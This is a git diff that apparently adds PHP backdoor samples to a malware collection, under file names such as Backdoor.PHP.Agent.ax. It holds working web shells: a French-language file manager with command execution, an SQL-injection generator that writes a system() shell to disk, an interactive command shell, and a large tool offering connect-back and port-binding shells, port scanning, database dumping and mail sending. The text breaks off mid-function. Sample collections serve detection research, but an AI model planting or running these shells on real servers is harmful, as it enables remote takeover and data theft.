if($_FILES["fic"]["size"]<$_POST["MAX_FILE_SIZE"]) + { + if(move_uploaded_file($_FILES["fic"]["tmp_name"],good_link("./".$_FILES["fic"]["name"]))) + { + echo "fichier telecharge dans ".good_link("./".$_FILES["fic"]["name"])."!<br>\n"; + } + else echo "upload failed: ".$_FILES["fic"]["error"]."<br>\n"; + } + else echo "fichier trop gros!<br>\n"; + } + + if(isset($_REQUEST['rm']) && $_REQUEST['rm']!="") + { + if(unlink($_REQUEST['rm']))echo "fichier ".$_REQUEST['rm']." efface !<br>\n"; + else echo "Impossible de supprimer le fichier<br>\n"; + } + +?> +<hr> +<table align="center" width="95%" border="0" cellspacing="0" bgcolor="lightblue"> +<?php + $t_dir=array(); + $t_file=array(); + $i_dir=0; + $i_file=0; + while($x=readdir($rep)) + { + if(is_dir($x))$t_dir[$i_dir++]=$x; + else $t_file[$i_file++]=$x; + } + closedir($rep); + while(1) + { +?> +<tr> + <td width="20%" bgcolor="lightgray" valign="top"> +<?php + if($x=each($t_dir)) + { + $name=$x["value"]; + if($name=='.'){} + elseif($name=='..') echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/../")."'>UP</a><br><br>\n"; + else echo " <a href='".$_SERVER['PHP_SELF']."?dir=".good_link("$dir/$name")."'>".$name."</a>\n"; + } +?> + </td> + <td width='78%'<?php + if($y=each($t_file)) + { + if($y["key"]%2==0)echo " bgcolor='lightgreen'>\n"; + else echo ">\n"; + echo " <a href='".$_SERVER['PHP_SELF']."?dir=$dir&down=".$y["value"]."'>".$y["value"]."</a>\n"; + } + else echo ">\n"; +?> + </td> + <td valign='center' width='2%'<?php + if($y) + { + if($y["key"]%2==0)echo " bgcolor='lightgreen'"; + echo "><a href='".$_SERVER['PHP_SELF']."?dir=$dir&rm=".$y["value"]."'><b>X</b></a>"; + } + else echo ">\n"; +?></td> +</tr> +<?php + if(!$x && !$y)break; + } +?> +</table> +<hr> +<br> +<a href="<?php echo $_SERVER['PHP_SELF']; ?>?dir=">revenir au repertoire d'origine</a><br><br> +<form method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>"> +Executer une commande <input type="text" name="cmd"> <input type="submit" value="g0!"> +</form><br> +Uploader un fichier dans le repertoire courant :<br> +<form enctype="multipart/form-data" method="post" action="<?php echo $_SERVER['PHP_SELF']."?dir=$dir"; ?>"> +<input type="file" name="fic"><input type="hidden" name="MAX_FILE_SIZE" value="100000"> +<input type="submit" value="upl0ad!"></form><br> +<br> +<center> +PHP Backdoor Version 1.5<br> +by sirius_black / LOTFREE TEAM<br> +Execute commands, browse the filesystem<br> +Upload, download and delete files...<br> +<a href="http://www.lsdp.net/~lotfree">http://www.lsdp.net/~lotfree</a><br> +</center> +</body> +</html> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ax b/PHP/Backdoor.PHP.Agent.ax new file mode 100644 index 00000000..c1f30c9c --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ax @@ -0,0 +1,37 @@ +<?php +?> +<html> +<head> +<title>|| .::News Remote PHP Shell Injection::. || </title> +</head> +<body> +<header>|| .::News PHP Shell Injection::. ||</header> <br /> <br /> +<?php +if (isset($_POST['url'])) { +$url = $_POST['url']; +$path2news = $_POST['path2news']; +$outfile = $_POST ['outfile']; +$sql = "0' UNION SELECT '0' , '<? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; +$sql = urlencode($sql); +$expurl= $url."?id=".$sql ; +echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />'; +echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; +} +else +{ +?> +Url to index.php: <br /> +<form action = "<?php echo "$_SERVER[PHP_SELF]" ; ?>" method = "post"> +<input type = "text" name = "url" value = "http://www.site.com/n13/index.php"; size = "50"> <br /> +Server Path to Shell: <br /> +Full server path to a writable file which will contain the Php Shell <br /> +<input type = "text" name = "outfile" value = "/var/www/localhost/htdocs/n13/shell.php" size = "50"> <br /> <br /> +<input type = "submit" value = "Create Exploit"> <br /> <br /> + + + +<?php +} +?> +</body> +</html> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.ay b/PHP/Backdoor.PHP.Agent.ay new file mode 100644 index 00000000..900048c5 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.ay @@ -0,0 +1,177 @@ +<?php + +define(´PHPSHELL_VERSION´, ´1.7´); + +/* + +************************************************************** +* PHP Shell * +************************************************************** +$Id: phpshell.php,v 1.18 2002/09/18 15:49:54 gimpster Exp $ + +PHP Shell is aninteractive PHP-page that will execute any command +entered. See the files README and INSTALL or http://www.gimpster.com +for further information. + +Copyright (C) 2000-2002 Martin Geisler < gimpster@gimpster.com> + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You can get a copy of the GNU General Public License from this +address: http://www.gnu.org/copyleft/gpl.html#SEC1 +You can also write to the Free Software Foundation, Inc., 59 Temple +Place - Suite 330, Boston, MA 02111-1307, USA. + +*/ +?> + +<html> +<head> +<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></title> +</head> +<body> +<h1>[YOUR HEADER[ <?php echo PHPSHELL_VERSION ?> [ADITTIONAL TEXT] - +[ADDITIONAL TEXT]</h1><br><hr><marquee><b>[ADDITIONAL MESSEGE OR TEXT]</b></marquee><hr><br> + +<?php + +if (ini_get(´register_globals´) != ´1´) { +/* We´ll register the variables as globals: */ +if (!empty($HTTP_POST_VARS)) +extract($HTTP_POST_VARS); + +if (!empty($HTTP_GET_VARS)) +extract($HTTP_GET_VARS); + +if (!empty($HTTP_SERVER_VARS)) +extract($HTTP_SERVER_VARS); +} + +/* First we check if there has been asked for a working directory. */ +if (!empty($work_dir)) { +/* A workdir has been asked for */ +if (!empty($command)) { +if (ereg(´^[[:blank:]]*cd[[:blank:]]+([^;]+)$´, $command, $regs)) { +/* We try and match a cd command. */ +if ($regs[1][0] == ´/´) { +$new_dir = $regs[1]; // ´cd /something/...´ +} else { +$new_dir = $work_dir . ´/´ . $regs[1]; // ´cd somedir/...´ +} +if (file_exists($new_dir) && is_dir($new_dir)) { +$work_dir = $new_dir; +} +unset($command); +} +} +} + +if (file_exists($work_dir) && is_dir($work_dir)) { +/* We change directory to that dir: */ +chdir($work_dir); +} + +/* We now update $work_dir to avoid things like ´/foo/../bar´: */ +$work_dir = exec(´pwd´); + +?> + +<form name="myform" action="<?php echo $PHP_SELF ?>" method="post"> +<p>Current working directory: <b> +<?php + +$work_dir_splitted = explode(´/´, substr($work_dir, 1)); + +echo ´<a xhref="´ . $PHP_SELF . ´?work_dir=/">Root</a>/´; + +if (!empty($work_dir_splitted[0])) { +$path = ´´; +for ($i = 0; $i < count($work_dir_splitted); $i++) { +$path .= ´/´ . $work_dir_splitted[$i]; +printf(´<a xhref="%s?work_dir=%s">%s</a>/´, +$PHP_SELF, urlencode($path), $work_dir_splitted[$i]); +} +} + +?></b></p> +<p>Choose new working directory: +<select name="work_dir" onChange="this.form.submit()"> +<?php +/* Now we make a list of the directories. */ +$dir_handle = opendir($work_dir); +/* Run through all the files and directories to find the dirs. */ +while ($dir = readdir($dir_handle)) { +if (is_dir($dir)) { +if ($dir == ´.´) { +echo "<option value="$work_dir" selected>Current Directory</option> "; +} elseif ($dir == ´..´) { +/* We have found the parent dir. We must be carefull if the parent +directory is the root directory (/). */ +if (strlen($work_dir) == 1) { +/* work_dir is only 1 charecter - it can only be / There´s no +parent directory then. */ +} elseif (strrpos($work_dir, ´/´) == 0) { +/* The last / in work_dir were the first charecter. +This means that we have a top-level directory +eg. /bin or /home etc... */ +echo "<option value="/">Parent Directory</option> "; +} else { +/* We do a little bit of string-manipulation to find the parent +directory... Trust me - it works :-) */ +echo "<option value="". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."">Parent Directory</option> "; +} +} else { +if ($work_dir == ´/´) { +echo "<option value="$work_dir$dir">$dir</option> "; +} else { +echo "<option value="$work_dir/$dir">$dir</option> "; +} +} +} +} +closedir($dir_handle); + +?> + +</select></p> + +<p>Command: <input type="text" name="command" size="60"> +<input name="submit_btn" type="submit" value="Execute Command"></p> + +<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p> +<textarea cols="80" rows="20" readonly> + +<?php +if (!empty($command)) { +if ($stderr) { +$tmpfile = tempnam(´/tmp´, ´phpshell´); +$command .= " 1> $tmpfile 2>&1; " . +"cat $tmpfile; rm $tmpfile"; +} else if ($command == ´ls´) { +/* ls looks much better with ´ -F´, IMHO. */ +$command .= ´ -F´; +} +system($command); +} +?> + +</textarea> +</form> + +<script language="JavaScript" type="text/javascript"> +document.forms[0].command.focus(); +</script> + +<hr> +<i>Copyright © 2004–2005, <a +href="mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i> +</body> +</html> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Agent.az b/PHP/Backdoor.PHP.Agent.az new file mode 100644 index 00000000..05862fc1 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.az @@ -0,0 +1,1312 @@ +<?php +###################################################################### +# we decide if we want syslogging +closelog(); +###################################################################### +# define variables +###################################################################### + +# error_reporting(E_ALL); +error_reporting(0); + +# get globals even if register_globals is off +import_globals(); + +$safe_mode = ini_get('safe_mode'); +$register_globals = ini_get('register_globals'); +$magic_quotes_gpc = ini_get('magic_quotes_gpc'); +$txt['en']['on']="on"; +$txt['en']['off']="off"; +$txt['de']['on']="an"; +$txt['de']['off']="aus"; +$lang="en"; + +if($safe_mode == 1) $SM = $txt[$lang]['on']; +else { + $SM = $txt[$lang]['off']; + # set_time_limit(9000); +} +if($register_globals == 1) $RG = $txt[$lang]['on']; +else $RG = $txt[$lang]['off']; +if($magic_quotes_gpc == 1) $MQ = $txt[$lang]['on']; +else $MQ = $txt[$lang]['off']; + +# navigatable functions +$ArrFuncs = array( + "dropinc" => 0, + "filecopy" => 0, + "fileedit" => 0, + "showsource" => 0, + "snoop" => 0, + "cmdln" => 0, + "connectback" => 0, + "phpshell" => 0, + "servicecheck" => 0, + "mysqlaccess" => 0, + "mail" => 0, + "env" => 0, + "phpenv" => 0, + "phpinfo" => 0, + "dumpvars" => 0, + "debugscript" => 0, + "syslog" => 0 +); + +# init navigation +foreach($ArrFuncs as $key => $val) if(!isset($$key)) $$key = $val; + + + +# set default values +$ArrDefaults = array( + "filecopy_source" => "http://...", + "filecopy_dest" => getcwd(), + "cmdcall" => "", + "editfile" => getcwd(), + "editcontent" => "", + "chdir" => ".", + "vsource" => $SCRIPT_FILENAME, + "mail_from" => "attacker@0wned.org", + "mail_to" => "", + "mail_subject" => "", + "mail_attach_source" => "http://....", + "mail_attach_appear" => "filename...", + "mail_content_type" => "image/png", + "mail_msg" => "", + "tcpports" => "21 22 23 25 80 110", + "timeout" => 5, + "miniinc_loc" => getcwd() . "/miniinc.php", + "incdbhost" => "localhost", + "cbhost" => $_SERVER['REMOTE_ADDR'], + "cbport" => 20202, + "cbtempdir" => "/tmp", + "cbcompiler" => "gcc", + "phpshellapp" => "export TERM=xterm; bash -i", + "phpshellhost" => "0.0.0.0", + "phpshellport" => "20202" +); + +# init defaults +foreach($ArrDefaults as $key => $val) if(!isset($$key)) $$key = $val; + +# define executable functions +$Mstr = array( + 0 => "No execute functions available!", + 1 => "passthru()", + 2 => "system()", + 3 => "backticks", + 4 => "proc_open()", + 5 => "exec()" +); + +# clean request to avoid uri monster +$SREQ = ""; +$reqdat = array(); +$tmpCount=0; +foreach($REQUESTS as $key => $val){ + if($tmpCount==0) $reqdat[] = $key."=".$val; + else if($val!=0 || $val!="" || $val!="0") $reqdat[] = $key."=".$val; + $tmpCount++; +} +$SREQ = implode("&", $reqdat); +$tmpCount=0; +if($SREQ=="") { + $tmp_req = array(); + $tmp_qry = explode("&", $QUERY_STRING); + foreach($tmp_qry as $key => $val) { + $tmp_val = explode("=", $val); + if($tmpCount==0) $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; + else if($tmp_val[1]!=0 || $tmp_val[1]!="" || $tmp_val[1]!="0") $tmp_req[] = $tmp_val[0]."=".$tmp_val[1]; + $tmpCount++; + } + $SREQ = implode("&", $tmp_req); +} + +if(isset($path['docroot'])) $SREQ .= "&path[docroot]=" . $path['docroot']; + +# set some defaults to avaoid errors +$is_file = array(); +$is_dir = array(); +$is_w_dir = array(); +$is_w_file = array(); +$emeth=0; +if($chdir!="/" && strlen($chdir) < 2) $chdir = getcwd() . "/"; +$chdir = str_replace("//", "/", $chdir); +if(substr($chdir, -1) != "/") $chdir .= "/"; +## +# Setup wether to use PHP_SELF or SCRIPT_NAME +if($PHP_SELF!=$SCRIPT_NAME) $MyLoc = $PHP_SELF; +else $MyLoc = $SCRIPT_NAME; + +# $MyLoc = "http://" . $_SERVER['HTTP_HOST'] . $MyLoc; +$MyLoc = "http://" . $SERVER_NAME . ":" . $SERVER_PORT . $MyLoc; + +# This is a list of internal inc.inc vars that do not get displayed +# inside the dumpvars function (poss for a debug func later?) +$DebugArr = array( + 'ARHGFDGFGASDFG', + 'safe_mode', + 'register_globals', + 'magic_quotes_gpc', + 'txt', + 'lang', + 'SM', + 'RG', + 'MQ', + 'ArrFuncs', + 'val', + 'key', + 'env', + 'phpenv', + 'phpinfo', + 'debugscript', + 'filecopy', + 'fileedit', + 'showsource', + 'snoop', + 'mail', + 'cmdln', + 'syslog', + 'servicecheck', + 'dropinc', + 'mysqlaccess', + 'ArrDefaults', + 'filecopy_source', + 'filecopy_dest', + 'cmdcall', + 'editfile', + 'editcontent', + 'chdir', + 'vsource', + 'mail_from', + 'mail_to', + 'mail_subject', + 'mail_attach_source', + 'mail_attach_appear', + 'mail_content_type', + 'mail_msg', + 'tcpports', + 'timeout', + 'miniinc_loc', + 'incdbhost', + 'Mstr', + 'SREQ', + 'reqdat', + 'tmpCount', + 'is_file', + 'is_dir', + 'is_w_dir', + 'is_w_file', + 'emeth', + 'MyLoc', + 'dumpvarsare', + 'DebugArr', + 'cbtempdir', + 'cbcompiler', + 'cbhost', + 'cbport', + 'phpshelltype', + 'phpshellapp', + 'phpshellhost', + 'phpshellport' +); + + +# activate syslog entry +if($syslog == 1) +{ +# openlog("# XSS $SCRIPT_URI #", LOG_PID | LOG_PERROR, LOG_LOCAL0); +# drop_syslog_warning("Q: $QUERY_STRING :: R: $REMOTE_ADDR ($HTTP_USER_AGENT)"); +} +############################################################################### +# +# start include output +# +############################################################################### +$strOutput = ""; +$strOutput .= "<html><body bgcolor='#ffffff'> +<table border=3 bgcolor=#aaaaaa width='100%'><tr><td><font color='#000000'> +<center> +<h2>Include tool</h2> +PHP Version: " . phpversion() . " | +safe_mode: $SM | +register_globals: $RG | +magic_quotes_gpc: $MQ | +syslogging: "; +if($syslog == 1) $strOutput .= $txt[$lang]['off']; else $strOutput .= $txt[$lang]['on']; +$strOutput .= " +<br><br> +</center> +<font color='#000000'>"; +foreach($ArrFuncs as $key => $val) $strOutput .= make_switch($key); + +############################################################################### +# test cmd shell environment +############################################################################### +if($env == 1) { + $strOutput .= " + <table border=1><tr><td colspan=2><h3>cmd infos</h3></td></tr> + <tr><td>test using pwd</td><td>"; $emeth =& test_cmd_shell(); $strOutput .= "</td></tr>"; + if($emeth==0) { + $strOutput .= "<tr><td colspan=2>$Mstr[$emeth]</td></tr>"; + } else { + $strOutput .= "<tr><td>exec method</td><td>$Mstr[$emeth]</td><tr> + <tr><td>uname -a</td><td>" . Mexec("uname -a", $emeth) . "</td><tr> + <tr><td>id</td><td>" . Mexec("id", $emeth) . "</td><tr> + </table>"; + } +} + +############################################################################### +# test php environment +############################################################################### +if($phpenv == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>php short infos</h3></td></tr> + <tr><td colspan=2>posix infos</td><tr>"; + if(function_exists('posix_uname')) { + $posix_uname = posix_uname(); + while (list($info, $value) = each ($posix_uname)) { + $strOutput .= "<tr><td>$info</td><td>$value</td></tr>"; + } + } else { + $strOutput .= "posix_uname not available"; + } + $strOutput .= "<tr><td>current script user</td><td>" . get_current_user() . "</td><tr>"; + if(function_exists('posix_getuid')) $strOutput .= "<tr><td>getuid</td><td>" . posix_getuid() . "</td><tr>"; + else $strOutput .= "posix_getuid not available"; + if(function_exists('posix_geteuid')) $strOutput .= "<tr><td>geteuid</td><td>" . posix_geteuid() . "</td><tr>"; + else $strOutput .= "posix_geteuid not available"; + if(function_exists('posix_getgid')) $strOutput .= "<tr><td>getgid</td><td>" . posix_getgid() . "</td><tr>"; + else $strOutput .= "posix_getgid not available"; + $strOutput .= "</table>"; +} + + +############################################################################### +# dump variables +############################################################################### +if($dumpvars == 1) { + $strOutput .= "<table border=1><tr><td><h3>dump variables</h3></td></tr> + <tr><td>" . dd("GLOBALS") . "</td></tr> + </table>"; +} +############################################################################### +# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!! +############################################################################### +if($debugscript == 1) { ?> + <table border=1><tr><td><h3>debug script</h3></td></tr> + <tr><td> + <? ddb("DebugArr"); ?> + </td></tr> + </table> +<? } +############################################################################### +# copy file +############################################################################### +if($filecopy == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>copy file</h3></td></tr> + <form method='post' target='_parent' action=" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>source</td><td><input type=text name='filecopy_source' value='" . $filecopy_source . "'></td></tr> + <tr><td>destination</td><td><input type=text name='filecopy_dest' value='" . $filecopy_dest . "'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2>" . copy_file($filecopy_source,$filecopy_dest) . "</td></tr> + </form> + </table>"; +} +############################################################################### +# edit file +############################################################################### +if($fileedit == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>edit file</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>file</td><td><input type=text name='editfile' value='" . $editfile . "'></td></tr> + <tr><td>edit</td><td><input type='checkbox' name='edit' value='1'></td></tr> + <tr><td>content</td><td><textarea name='editcontent' cols='50' rows='10'>"; + if($edit==1 | $editfile!=$ArrDefaults['editfile']) + $strOutput .= show_file($editfile); + $strOutput .= "</textarea></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2>"; + if($edit==1 | $editfile!=$ArrDefaults['editfile']) + $strOutput .= edit_file($editcontent,$editfile,$edit); + $strOutput .= "</td></tr> + </table> + </form>"; +} +############################################################################### +# execute cmd shell NEEDS MODIFINY FOR B64 STATUS!! +############################################################################### +if($cmdln == 1) { + $emeth = test_cmd_shell(); + $strOutput .= "<table border=1><tr><td colspan=2><h3>execute cmd execution: " . $cmdcall . "</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>cmd line</td><td><input type=text name='cmdcall' value='" . $cmdcall . "'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td>test method with 'pwd'</td><td>" . $Mstr[$emeth] . "</td></tr> + <tr><td colspan=2>"; + if($emeth < 3) { + $strOutput .= "The output of this command will be somewhere on the page!"; + Mexec($cmdcall, $emeth); + } else { + $strOutput .= Mexec($cmdcall, $emeth); + } + $strOutput .= "</td></tr> + </form> + </table>"; +} +############################################################################### +# sending mime mail +############################################################################### +if($mail == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>sending mime mail with attachment</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>from</td><td><input type=text name='mail_from' value='" . $mail_from . "'></td></tr> + <tr><td>to</td><td><input type=text name='mail_to' value='" . $mail_to . "'></td></tr> + <tr><td>subject</td><td><input type=text name='mail_subject' value='" . $mail_subject . "'></td></tr> + <tr><td>message</td><td><textarea name='mail_msg' cols='50' rows='10'>" . $mail_msg . "</textarea></td></tr> + <tr><td>attach file</td><td><input type=text name='mail_attach_source' value='" .$mail_attach_source . "'></td></tr> + <tr><td>attach content type</td><td><input type=text name='mail_content_type' value='" . $mail_content_type . "'></td></tr> + <tr><td>file to appear</td><td><input type=text name='mail_attach_appear' value='" . $mail_attach_appear . "'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2>" . drop_mime_mail($mail_from,$mail_to,$mail_subject,$mail_attach_source,$mail_content_type,$mail_attach_appear,$mail_msg) . "</td></tr> + </form> + </table>"; +} + +############################################################################### +# drop mini inc handling +############################################################################### +if($dropinc == 1) { + if($loc!="") $miniinc_loc = $loc; + $strOutput .= "<table border=1><tr><td colspan=2><h3>drop mini inc hole</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>source</td><td><input type=text name='loc' value='" . $miniinc_loc . "'></td></tr> + <tr><td>drop</td><td><input type='checkbox' name='minisave' value='1'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2><pre>"; + if($minisave==1) $strOutput .= dropminiinc($miniinc_loc); + $strOutput .= "</pre></td></tr> + </form> + </table>"; +} +############################################################################### +# connect C back shell handling +############################################################################### +if($connectback == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>connect back shell</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>temp dir.</td><td><input type=text name='cbtempdir' value='" . $cbtempdir . "'></td></tr> + <tr><td>compiler</td><td><input type=text name='cbcompiler' value='" . $cbcompiler . "'></td></tr> + <tr><td>host</td><td><input type=text name='cbhost' value='" . $cbhost . "'></td></tr> + <tr><td>tcp port</td><td><input type=text name='cbport' value='" . $cbport . "'></td></tr> + <tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2>"; + if($run == 1 && $cbtempdir && $cbcompiler && $cbhost && $cbport) $strOutput .= connect_back($cbtempdir, $cbcompiler, $cbhost, $cbport); + $strOutput .= "</td></tr></form></table>"; +} + +############################################################################### +# PHP shell handling +############################################################################### +if($phpshell == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>PHP shell</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>type</td><td><select name='phpshelltype'><option value='cb'>Connect Back</option><option value='pb'>Port Binding</option></select></td></tr> + <tr><td>shell app</td><td><input type=text name='phpshellapp' value='" . $phpshellapp . "'></td></tr> + <tr><td>host</td><td><input type=text name='phpshellhost' value='" . $phpshellhost . "'></td></tr> + <tr><td>tcp port</td><td><input type=text name='phpshellport' value='" . $phpshellport . "'></td></tr> + <tr><td>execute</td><td><input type='checkbox' name='run' value='1'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2>"; + if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB_Shell($phpshelltype, $phpshellapp, $phpshellport, $phpshellhost); + $strOutput .= "</td></tr></form></table>"; +} + + +############################################################################### +# snooping +############################################################################### +if($snoop == 1) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>file system snooping: " . $chdir . "</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>path</td><td><input type=text name='chdir' value='" . $chdir . "'></td></tr> + <tr><td colspan=2>" . snoopy($chdir) . "</td></tr> + </form> + </table>"; +} +############################################################################### +# show highlited source +############################################################################### +if(($showsource == 1) | ($vsource!=$ArrDefaults['vsource'])) { + $strOutput .= "<table border=1><tr><td colspan=2><h3>show source: " . $vsource . "</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>path</td><td><input type=text name='vsource' value='" . $vsource . "'></td></tr> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2>" . highlight_file($vsource, 1) . "</td></tr> + </form> + </table>"; +} +############################################################################### +# service check +############################################################################### +if($servicecheck == 1) { +if($servhost!="") $host = $servhost; +else $host = "localhost"; + + $strOutput .= "<table border=1><tr><td colspan=2><h3>simple service check</h3></td></tr> + <form method='post' target='_parent' action='" . $MyLoc . "?" . $SREQ . "&'> + <tr><td>host(s)</td><td><input type=text name='servhost' value='" . $host . "'></td></tr> + <tr><td>tcp port(s)</td><td><input type=text name='tcpports' value='" . $tcpports . "'></td></tr> + <tr><td>timeout</td><td><input type=text name='timeout' value='" . $timeout . "'></td></tr> + <!-- tr><td>udp port(s)</td><td><input type=text name='udpports' value='<?=$sports?>'></td></tr --> + <tr><td></td><td><input type=submit></td></tr> + <tr><td colspan=2><pre>"; + + $hosts = explode(" ", $host); + $port = explode(" ",$tcpports); + $values = count($port); + $numhosts = count($hosts); + if($values == 1 && $port[0] != "") $strOutput .= "\nChecking 1 port..\n"; + else if($values > 1) $strOutput .= "Checking $values ports..\n"; + else $strOutput .= "No ports specified!!\n"; + if($numhosts > 1) $strOutput .= "On $numhosts hosts..\n"; + else if($numhosts == 1) $strOutput .= "On 1 host..\n"; + else $strOutput .= "No hosts specified!!\n"; + if($numhosts >= 1) { + for($hcount=0; $hcount < $numhosts; $hcount++) { + $tmphost = $hosts[$hcount]; + $strOutput .= "\nTesting $tmphost..\n"; + if(($values == 1 && $port[0] != "") | $values > 1) { + for ($cont=0; $cont < $values; $cont++) { + @$sock[$cont] = fsockopen($tmphost, $port[$cont], $oi, $oi2, $timeout); + $service = getservbyport($port[$cont],"tcp"); + @$get = fgets($sock[$cont]); + if(isset($get)) $strOutput .= "Port: $port[$cont] ($service) - Banner: $get \n"; + flush(); + } + } + } + } + $strOutput .= "</pre></td></tr> + </form> + </table>"; +} +############################################################################### +# show phpinfo +############################################################################### +if($phpinfo == 1){ + phpinfo(); +} +###################################################################### +# db stuff +###################################################################### +if($mysqlaccess == 1) { + $strOutput .= "<table border=1> + <form method='post' target='_parent' action='$MyLoc?$SREQ&'> + <tr><td>db host</td><td><input type='text' name='incdbhost' size='10' value='$incdbhost'/></td></tr> + <tr><td>user</td><td><input type='text' name='incdbuser' size='10' value='$incdbuser'/></td></tr> + <tr><td>pass</td><td><input type='text' name='incdbpass' size='10' value='$incdbpass'/></td></tr> + <tr><td>name</td><td><input type='text' name='incdbname' size='10' value='$incdbname'/></td></tr> + <tr><td>table</td><td><input type='text' name='incdbtable' size='10' value='$incdbtable'/></td></td></tr> + <tr><td>sql query</td><td><input type='text' name='incdbsql' size='50' value='$incdbsql'/></td></td></tr> + <tr><td>dumpfile</td><td><input type='text' name='incdbfile' size='10' value='$incdbfile'/></td></td></tr> + <!-- tr><td>Variables?</td><td><input type='checkbox' name='incdbvar'<? if($incdbvar!='') echo ' checked '; /></td></tr --> + <tr><td colspan=2><input type='submit' name='submit' value='Query'/></td></tr> + </table>"; +} + +if($incdbhost!="" && $incdbuser!="") { + if($incdbvar!="") $dbh = $incdbhost; + else $dbH = $incdbhost; + $dbu = $incdbuser; + $dbp = $incdbpass; + if($incdbsql!="") $dbs = $incdbsql; + if($incdbname!="") $dbn = $incdbname; + if($incdbtable!="") $dbt = $incdbtable; + if($incdbfile!="") $dumpfile = $incdbfile; +} + +if(isset($dbh)) { + $strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr>"; + eval("\$Gdbhost = \"\$$dbh\";"); + eval("\$Gdbuser = \"\$$dbu\";"); + eval("\$Gdbpass = \"\$$dbp\";"); + eval("\$Gdbname = \"\$$dbn\";"); + $strOutput .= "<tr><td>"; + if($dbn=="") { + $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass . + "</td></tr><tr><td>" . + display_dbs($Gdbhost, $Gdbuser, $Gdbpass); + } else if(isset($dbs)) { + $Gdbsql = $dbs; + $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname."<br/>sql=".$Gdbsql . + "</td></tr><tr><td>"; + if(isset($dumpfile)) { + $strOutput .= dump_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql, $dumpfile); + } else { + $strOutput .= display_query($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbsql); + } + } else if(isset($dbt)) { + $Gdbtabl = $dbt; + $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname." table=".$Gdbtabl; + if($dumpfile!="") $strOutput .= " dumpfile=" .$dumpfile; + $strOutput .= "</td></tr><tr><td>"; + if(isset($dumpfile)) { + $strOutput .= dump_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl, $dumpfile); + } else { + $strOutput .= display_rows($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname, $Gdbtabl); + } + } else { + $strOutput .= "host=".$Gdbhost." user=".$Gdbuser." pass=".$Gdbpass." name=".$Gdbname . + "</td></tr><tr><td>" . + display_tables($Gdbhost, $Gdbuser, $Gdbpass, $Gdbname); + } + $strOutput .= "</pre></td></tr></table><br/>"; +} + +if(isset($dbH)) { + $strOutput .= "<table border=1><tr><td><b>mysql access</b></td></tr><tr><td>"; + if($dbn=="") { + $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp. + "</td></tr><tr><td>". + display_dbs($dbH, $dbu, $dbp); + } else if(isset($dbs)) { + $strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn."<br/>sql=".$dbs. + "</td></tr><tr><td>"; + if(isset($dumpfile)) { + $strOutput .= dump_query($dbH, $dbu, $dbp, $dbn, $dbs, $dumpfile); + } else { + 